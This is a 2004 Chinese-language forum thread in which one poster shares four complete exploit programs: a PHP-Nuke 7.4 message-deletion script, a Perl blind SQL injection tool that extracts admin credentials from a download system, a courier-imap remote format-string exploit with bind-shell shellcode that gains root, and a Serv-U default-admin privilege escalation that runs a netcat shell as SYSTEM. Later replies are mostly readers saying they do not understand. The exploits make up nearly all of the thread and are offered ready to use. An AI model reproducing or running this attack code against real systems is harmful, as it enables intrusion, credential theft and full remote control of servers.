标题:
几个攻击脚本集合
作者:
路还长
时间:
2004-9-27 14:30
标题:
几个攻击脚本集合
PHP-Nuke 7.4 SQL Injection Exploit [XSS]/SQL Injection PHP-Nuke Delete Message(s) Bug by bima_ Php-Nuke is a popular freeware content management system. Based on information at :
http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+PHP-Nuke+7.4+Add+Message+Bug<;;/a> An attacker permitted to post to global home-page messages. I found that we can delete message(s) too. I wrote a little perl script to prove it, i used POST method. Here it is : ******cut here************** #!/usr/bin/perl # use LWP; $log = "pos_phpnuke_deletemsg.txt"; $Agent = "Mbahmu/1.0"; $proxy = "
http://172.9.1.11:80/<;;/a>"; # proxy:port ... $browser = LWP::UserAgent->new; $browser -> agent($Agent); $url = '
http://www.sitewithphpnuke.com/admin.php<;;/a>'; $browser->proxy(http => $proxy) if defined($proxy); printlog ("\nProcessing: $url\n"); for ($a = 1; $a < 11; $a++) { $mid=$a; $loginpost = $url; $loginrequest = HTTP::Request->new(POST => $loginpost); $loginrequest->content_type('application/x-www-form-urlencoded'); $loginsend = 'mid='.$mid. '&ok=1'. '&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. '&add_radminsuper=1'. '&op=deletemsg'; $loginrequest->content-length($loginsend); $loginrequest->content($loginsend); $loginresponse = $browser->request($loginrequest); $logincek = $loginresponse->as_string; #print ($logincek); if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){ printlog ("$mid attempting delete message sending OK ".$loginresponse->status_line ."\n"); } else { printlog ("$mid could be failure ".$loginresponse->status_line ."\n"); last; } } #end of for sub printlog { print @_[0]; open(lo,">>$log"); print lo @_[0]; close(lo); return; } ******cut here************** ---------------------------------------------------------- *very very very special greetz to: [+][+][+] my beloved anna [+][+][+] *shout to dhanny firman syah : keep fighting, bro... *special greetz to: [+]
www.neoteker.or.id
[+]
www.echo.or.id
[+]
www.bosen.net
[+] qq [+] tiyox [+] bosen [+] ftp_geo [+] tiong [+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net [+] all #1stlink #romance #hackers @ centrin [+] sj, alphacentupret, boeboe, fuzk3 kendi [+] y3d1ps, z3r0byt3, biatch-x, K-159 *contact: [+]
iko94@yahoo.com
[+]
www.geocities.com/iko94
[+]
www.neoteker.or.id
[EOF]
作者:
路还长
时间:
2004-9-27 14:31
标题:
几个攻击脚本集合
惊云下载系统漏洞利用Exploits #!/usr/bin/perl #The s cript Crack admin for SQL 注入 #Code by xiaolu use IO::Socket; $ARGC = @ARGV; if ($ARGC < 3) { print "\n\n"; print "\t* The script write by Xiaolu *\n\n"; print "例子: jy.pl 666w.com /down/admin/edit.asp 80\n"; exit; } $host = @ARGV[0]; $way = @ARGV[1]; $port = @ARGV[2]; $errinfo="原密码错误"; print "\n\n开始在 $host 上进行测试,请等待......\n"; for ($userlen=1;$userlen<=20;$userlen++) { $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(user)%3D$userlen%09and%09'1%3D1"; &url;@res = &connect; #print "\n @res \n"; if ("@res" =~ /$errinfo/) { print "* 发现user长度为: $userlen 位\n"; last; } } for ($pwdlen=1;$pwdlen<=20;$pwdlen++) { $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(pwd)%3D$pwdlen%09and%09'1%3D1"; &url;@res = &connect; #print "\n @res \n"; if ("@res" =~ /$errinfo/) { print "* 发现pwd长度为: $pwdlen 位\n"; last; } } @dig=(0..9); @char=(a..z); @dchar=(A..Z); @tchar=qw(` ~ ! + @ # $ %25 ^ & * \( \) _ = - { } [ ] : ; < > ? | , . / \\); @dic=(@char,@dig,@tchar); @dic1=(@dig,@char,@tchar,@dchar); print "\n开始尝试获取user,请等待......\n"; for ($userlocat=1;$userlocat<=$userlen;$userlocat++) { foreach $usertemp(@dic) { $user=$userdic.$usertemp; $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(user,$userlocat)%3D'$user'%09and%09'1%3D1"; #print "$usertemp "; &url;@res = &connect; if ("@res" =~ /$errinfo/) { $userdic=$user; if ($userlocat==$userlen){print "\n\n* user获取成功!!! : $user \n";last;} print "* user共 $userlen 位,前 $userlocat 位为 $user \n"; last; } } } print "\n开始尝试获取pwd,请等待......\n"; for ($pwdlocat=1;$pwdlocat<=$pwdlen;$pwdlocat++) { foreach $pwdtemp(@dic1) { $pwd=$pwddic.$pwdtemp; $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(pwd,$pwdlocat)%3D'$pwd'%09and%09'1%3D1"; #print "$pwdtemp "; &url;@res = &connect; if ("@res" =~ /$errinfo/) { $pwddic=$pwd; if ($pwdlocat==$pwdlen){print "\n\n* pwd获取成功!!! 
: $pwd \n";last;} print "* pwd共 $pwdlen 位,前 $pwdlocat 位为 $pwd \n"; last; } } } sub url { $req = "POST $way HTTP/1.1\r\n". "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n". "Referer:
http://$host$way<;/a>\r\n". "Accept-Language: zh-cn\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n". "Host: $host\r\n". "Content-Length: 164\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n". "Cookie: ASPSESSIONIDCQDSRBCC=PNKEJFPDCHNPPHOCJICEPCHP; JyDownUserDj=3; JyDownUserName=$way1\r\n". "\r\n". "type=save&pwd=1&pwd1=&pwd2=&sex=%C4%D0&face=&oicq=&email=&homepage=&qm=%BB%B6%D3%AD%C4%E3%C0%B4%B5%BD%BB%AA%CC%DA%C1%AA%BA%CF.&softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4\r\n\r\n"; } sub connect { my $connection = IO::Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $connection $req; my @res = <$connection>; close $connection; return @res; }
作者:
路还长
时间:
2004-9-27 14:32
标题:
几个攻击脚本集合
courier-imap down 3.0.2-r1 Remote Format String exp /* courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit Author: ktha at hush dot com Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2 Special thanks goes to andrewg for providing the FreeBSD box. Greetings: all the guys from irc pulltheplug com and irc netric org bash-2.05b$ ./sm00ny-courier_imap_fsx courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com Launching attack against 127.0.0.1:143 [+] Got current ebp(5100): 0xbfbfb050 [+] Got possible saved ebp(3281): 0xbfbfe390 [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0 [+] Verifying...failed [+] Got possible saved ebp(3286): 0xbfbfe3a4 [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4 [+] Verifying...failed [+] Got possible saved ebp(3287): 0xbfbfe3a8 [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8 [+] Verifying...OK [+] Building fmt...done [+] Building shellcode...done Using ret: 0x8057000 Using got of fprintf(): 0x804fefc Checking for shell.. uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) N.B. 1. ret can be guessed ;) 2. got, well.. that's a different story, it must be bruteforced 3. "ce_number" & "se_number" can be set with some default values when running multiple times 4. shell is usable for aprox 1 min [ Need a challenge ? ] [ Visit
http://www.pulltheplug.com ] */ #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BIGBUF 2048 #define IMAP_PORT 143 #define END_BRUTEFORCE_STACK 5500 #define TOP_STACK 0xbfc00000 /* FreeBSD */ #define START_BRUTEFORCE_SAVED_EBP 3000 #define JUNK 9 #define GAP_EBP_ESP 48 #define DUMMY_NUMBER 100 void die(int type, char *message) { if(type == 2) perror(message); else fprintf(stderr,"%sn",message); exit(1); } int connect_to (char *host, int port){ struct hostent *h; struct sockaddr_in c; int sock; if ((host == NULL) || (*host == (char) 0)) die(1, "[-] Invalid hostname"); if ((c.sin_addr.s_addr = inet_addr (host)) == -1){ if ((h = gethostbyname (host)) == NULL) die(1, "[-] Cannot resolve host"); memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr)); } if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) die(2,"[-] Error creating socket:"); c.sin_family = PF_INET; c.sin_port = htons (port); if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1) die(2, "[-] Cannot connect: "); return sock; } void close_socket (int sock){ shutdown (sock, 2); close (sock); } char *get_request(char *username, char *password){ char *request = (char *)malloc(strlen(username)+strlen(password)+20); sprintf(request,"1 LOGIN "%s" "%s"rn",username, password); return request; } void send_data(int sock, char *request){ int n; n = send (sock, request, strlen (request), 0); if (n != strlen (request)){ close_socket (sock); die(1, "Error sending requestn"); } } int get_ce_number(char *host, int port){ int sock; int loop; char temp[BIGBUF]; int l,n; char username[BIGBUF]; char password[BIGBUF]; char *request; for (loop = END_BRUTEFORCE_STACK;;loop--){ sock = connect_to(host, port); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%d$p",loop); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) break; } return loop; } int get_se_number(int start, int end, char *host, int port){ int loop; 
char username[BIGBUF]; char password[BIGBUF]; char *request; int l,n; char temp[BIGBUF]; int sock; if (!start) start = START_BRUTEFORCE_SAVED_EBP; for (loop = start; loop < end; loop++){ sock = connect_to(host, port); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%d$n",loop); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) break; } if (loop == end) return -1; return loop; } int verify_se_number(int write, unsigned long addy, int number, char *host, int port){ char username[BIGBUF]; char password[BIGBUF]; char temp[BIGBUF]; char *request; int n, sock; sock = connect_to(host, port); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n <= 0) return 0; sock = connect_to(host, port); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%u$n%%%u$hn", number, write); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) return 0; return 1; } int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){ int i,j,sum,byte; int *vec = (int *)malloc(11 * sizeof(int)); sum = JUNK; for (i=0; i<2; i++){ for (j=0; j<2; j++){ vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum; while (vec[2*(2 * i + j)] <= 12) vec[2*(2 * i + j)] += 0x10000; sum += vec[2*(2 * i + j)]; byte = ((got + 2 * i) >> (16*j)) & 0xffff; vec[2*(2 * i + j) + 1] = byte - sum; while (vec[2*(2 * i + j) + 1] <= 12) vec[2*(2 * i + j) + 1] += 0x10000; sum += vec[2*(2 * i + j) + 
1]; got_addy += 2; } } for (i=0; i<2; i++){ byte = (ret >> (16*i)) & 0xffff; vec[8+i] = byte - sum; while (vec[8+i] <= 12) vec[8+i] += 0x10000; sum += vec[8+i]; } return vec; } char *get_format_string(int *vec, int se_number, int write_number, int got_number){ char *buf = (char *) malloc(BIGBUF); char smallbuf[256]; int i; for (i=0; i<4; i++){ sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number); strcat(buf,smallbuf); } for (i=0; i<2; i++){ sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i); strcat(buf,smallbuf); } return buf; } char *gen_shellcode (int gap){ int size; char *p; char shellcode[] = /* Thanks ilja */ "x31xc0x31xc9x31xd2xb0x61" "x51xb1x06x51xb1x01x51xb1" "x02x51x8dx0cx24x51xcdx80" "xb1x02x31xc9x51x51x51x80" "xc1x77x66x51xb5x02x66x51" "x8dx0cx24xb2x10x52x51x50" "x8dx0cx24x51x89xc2x31xc0" "xb0x68xcdx80xb3x01x53x52" "x8dx0cx24x51x31xc0xb0x6a" "xcdx80x31xc0x50x50x52x8d" "x0cx24x51x31xc9xb0x1excd" "x80x89xc3x53x51x31xc0xb0" "x5axcdx80x41x53x51x31xc0" "xb0x5axcdx80x41x53x51x31" "xc0xb0x5axcdx80x31xdbx53" "x68x6ex2fx73x68x68x2fx2f" "x62x69x89xe3x31xc0x50x54" "x53x50xb0x3bxcdx80x31xc0" "xb0x01xcdx80"; size = strlen (shellcode); p = (char *) malloc (gap + 1); /* Some nops ;) */ memset (p, 0x41, gap); memcpy (p + gap - size, shellcode, size + 1); return p; } void root(char *host) { fd_set rfds; int n; int sock; char buff[1024]; sock = connect_to(host,30464); send(sock,"id;n",4,0); while(1) { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); if(select(sock+1, &rfds, NULL, NULL, NULL) < 1) exit(0); if(FD_ISSET(0,&rfds)) { if( (n = read(0,buff,sizeof(buff))) < 1) exit(0); if( send(sock,buff,n,0) != n) exit(0); } if(FD_ISSET(sock,&rfds)) { if( (n = recv(sock,buff,sizeof(buff),0)) < 1) exit(0); write(1,buff,n); } } } main (int argc, char **argv) { char *host="127.0.0.1"; int port = IMAP_PORT; int sock; char *temp1, *temp2; char *request; int *vec; int n,ok,i; unsigned long cur_ebp; // was 5100 on my box int ce_number = 
0; unsigned long saved_ebp; // was 3287 on my box int se_number = 0; unsigned long write_addy; int write_number = 0; unsigned long got_addy; int got_number = 0; /* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */ unsigned long got = 0x0804fefc; /* heh.. it's up to you to find this one :P Just use your favourite mathod */ unsigned long ret = 0x8057000; if (argc > 1) host = argv[1]; printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot comn"); printf(" Launching attack against %s:%dn",host,port); if (ce_number == 0) ce_number = get_ce_number(host,port); cur_ebp = TOP_STACK - 4 * ce_number; got_number = DUMMY_NUMBER; got_addy = cur_ebp + 4 * (got_number - 1); printf("[+] Got current ebp(%d): %pn",ce_number,cur_ebp); do{ se_number = get_se_number(se_number,ce_number,host,port); if (se_number == -1) die(1,"[-] Failed to get a saved_ebp !"); saved_ebp = cur_ebp + 4 * (se_number - 1); printf("[+] Got possible saved ebp(%d): %pn",se_number,saved_ebp); write_addy = GAP_EBP_ESP + saved_ebp; write_number = (write_addy - cur_ebp) / 4 + 1; printf("[+] Got possible write on the stack pointer(%d): %pn",write_number,write_addy); printf("[+] Verifying..."); ok = verify_se_number(write_number,got_addy,se_number,host,port); if (ok) printf("OKn"); else { printf("failedn"); se_number++; } }while (!ok); printf("[+] Building fmt..."); vec = get_format_vector(got_addy,got,ret); temp1 = get_format_string(vec,se_number,write_number,got_number); printf("donen"); printf("[+] Building shellcode..."); temp2 = gen_shellcode(800); printf("donen"); printf(" Using ret: %pn",ret); printf(" Using got of fprintf(): %pn",got); request = get_request(temp1,temp2); sock = connect_to(host, port); send_data(sock,request); sleep(2); close_socket (sock); printf(" Checking for shell..n"); root(host); }
作者:
路还长
时间:
2004-9-27 14:34
标题:
几个攻击脚本集合
Serv-U FTP Default Admin Account Vulnerability /* * Hax0rcitos proudly presents * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0) * * All Serv-u Versions have default Login/password for local Administration. * This account is only available to connect in the loopback interface, so a * local user will be able to connect to Serv-u with this account and create * an ftp user with execute rights. after the user is created, just connect * to the ftp server and execute a raw "SITE EXEC" command. the program will * be executed with SYSTEM privileges. * * Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * * Date: 10/2003 * Author: Andrés Tarascó Acunha * * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =) * * Tested Against Serv-u 4.x and v5.1.0.0 G:\exploit\serv-U\local>whoami INSANE\aT4r G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe" Serv-u >3.x Local Exploit by Haxorcitos <220 Serv-U FTP Server v5.0 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=3 220 Domain settings saved ****************************************************** [+] Domain Haxorcitos:3 Created [+] Setting New Domain Online <220 Server command OK ****************************************************** [+] Creating Evil User <200-User=haxorcitos 200 User settings saved ****************************************************** [+] Now Exploiting... >USER haxorcitos <331 User name okay, need password. 
****************************************************** >PASS whitex0r <230 User logged in, proceed. ****************************************************** [+] Now Executing: nc -l -p 99 -e cmd.exe <220 Domain deleted ****************************************************** G:\exploit\serv-U\local>nc localhost 99 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>whoami whoami NT AUTHORITY\SYSTEM C:\> */ #include
#include
#include
#include
#include
//Responses #define BANNER "220 " #define USEROK "331 User name okay" #define PASSOK "230 User logged in, proceed." #define ADMOK "230-Switching to SYSTEM MAINTENANCE mode." #define DOMAINID "200-DomainID=" //Commands #define XPLUSER "USER haxorcitos\r\n" #define XPLPASSWORD "PASS whitex0r\r\n" #define USER "USER LocalAdministrator\r\n" #define PASSWORD "PASS #l@$ak#.lk;0@P\r\n" #define MAINTENANCE "SITE MAINTENANCE\r\n" #define EXIT "QUIT\r\n" char newdomain[]="-SETDOMAIN\r\n" "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n" "-TZOEnable=0\r\n" " TZOKey=\r\n"; /* "-DynDNSEnable=0\r\n" " DynIPName=\r\n"; */ char deldomain[]="-DELETEDOMAIN\r\n" "-IP=0.0.0.0\r\n" " PortNo=2121\r\n"; char newuser[] = "-SETUSERSETUP\r\n" "-IP=0.0.0.0\r\n" "-PortNo=2121\r\n" "-User=haxorcitos\r\n" "-Password=whitex0r\r\n" "-HomeDir=c:\\\r\n" "-LoginMesFile=\r\n" "-Disable=0\r\n" "-RelPaths=1\r\n" "-NeedSecure=0\r\n" "-HideHidden=0\r\n" "-AlwaysAllowLogin=0\r\n" "-ChangePassword=0\r\n" "-QuotaEnable=0\r\n" "-MaxUsersLoginPerIP=-1\r\n" "-SpeedLimitUp=0\r\n" "-SpeedLimitDown=0\r\n" "-MaxNrUsers=-1\r\n" "-IdleTimeOut=600\r\n" "-SessionTimeOut=-1\r\n" "-Expire=0\r\n" "-RatioUp=1\r\n" "-RatioDown=1\r\n" "-RatiosCredit=0\r\n" "-QuotaCurrent=0\r\n" "-QuotaMaximum=0\r\n" "-Maintenance=None\r\n" "-PasswordType=Regular\r\n" "-Ratios=None\r\n" " Access=c:\\|RELP\r\n"; #define localport 43958 #define localip "127.0.0.1" char cadena[1024]; int rec,domain; /******************************************************************************/ void ParseCommands(int sock, char *data, int ShowSend, int showResponses, char *response) { send(sock,data,strlen(data),0); if (ShowSend) printf(">%s",data); Sleep(100); do { rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; if (rec<=0) return; if (showResponses) printf("<%s",cadena); if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0) domain=atoi(cadena+strlen(DOMAINID)); //} while (strncmp(cadena,response,strlen(response))!=0); } while 
(strstr(cadena,response)==NULL); printf("******************************************************\r\n"); } /******************************************************************************/ int main(int argc, char* argv[]) { WSADATA ws; int sock,sock2; struct sockaddr_in haxorcitos; struct sockaddr_in xpl; printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n"); if (argc<2) { printf("USAGE: ServuLocal.exe \"command\"\r\n"); printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\""); return(0); } if (WSAStartup( MAKEWORD(2,2), &ws )!=0) { printf(" [-] WSAStartup() error\n"); exit(0); } haxorcitos.sin_family = AF_INET; haxorcitos.sin_port = htons(localport); haxorcitos.sin_addr.s_addr = inet_addr(localip); sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)); rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; printf("<%s",cadena); ParseCommands(sock,USER,1,1,USEROK); ParseCommands(sock,PASSWORD,1,1,PASSOK); ParseCommands(sock,MAINTENANCE,1,0,"230 "); printf("[+] Creating New Domain...\r\n"); ParseCommands(sock,newdomain,0,1,BANNER); printf("[+] Domain Haxorcitos:%i Created\n",domain); /* Only for v5.x printf("[+] Setting New Domain Online\r\n"); sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain); ParseCommands(sock,cadena,0,1,BANNER); */ printf("[+] Creating Evil User\r\n"); ParseCommands(sock,newuser,0,1,"200 "); Sleep(1000); printf("[+] Now Exploiting...\r\n"); xpl.sin_family = AF_INET; xpl.sin_port = htons(2121); xpl.sin_addr.s_addr = inet_addr(localip); sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl)); rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0'; ParseCommands(sock2,XPLUSER,1,1,USEROK); ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK); printf("[+] Now Executing: %s\r\n",argv[1]); sprintf(cadena,"site exec %s\r\n",argv[1]); send(sock2,cadena,strlen(cadena),0); shutdown(sock2,SD_BOTH); Sleep(100); 
ParseCommands(sock,deldomain,0,1,BANNER); send(sock,EXIT,strlen(EXIT),0); shutdown(sock,SD_BOTH); closesocket(sock); closesocket(sock2); return 0; }
作者:
墓志铭
时间:
2004-9-27 21:16
标题:
几个攻击脚本集合
有些看不懂了,知识不够用了。
想问一下,?
还有一个很蠢的问题,PHP是干什么用的。总看到PHP写的代码,但却不知道PHP主要是干什么用的。………………郁闷,
作者:
路还长
时间:
2004-9-28 10:44
标题:
几个攻击脚本集合
键盘,
作者:
路还长
时间:
2004-9-28 10:44
标题:
几个攻击脚本集合
八十八
作者:
路还长
时间:
2004-9-28 10:47
标题:
几个攻击脚本集合
分时,,,,,,
作者:
skyxhc
时间:
2004-9-29 11:56
标题:
几个攻击脚本集合
?????
作者:
x86
时间:
2004-10-3 14:14
标题:
几个攻击脚本集合
what?
作者:
我是中国人
时间:
2004-10-4 10:48
标题:
几个攻击脚本集合
???不懂
作者:
酷海狂龙
时间:
2004-10-4 21:16
标题:
几个攻击脚本集合
可惜,偶看不懂,谁能详细解析一下啊!!
作者:
lovehua115
时间:
2004-10-5 04:17
标题:
几个攻击脚本集合
恩,看不懂拉
作者:
bridge8502
时间:
2004-11-27 03:11
标题:
几个攻击脚本集合
不懂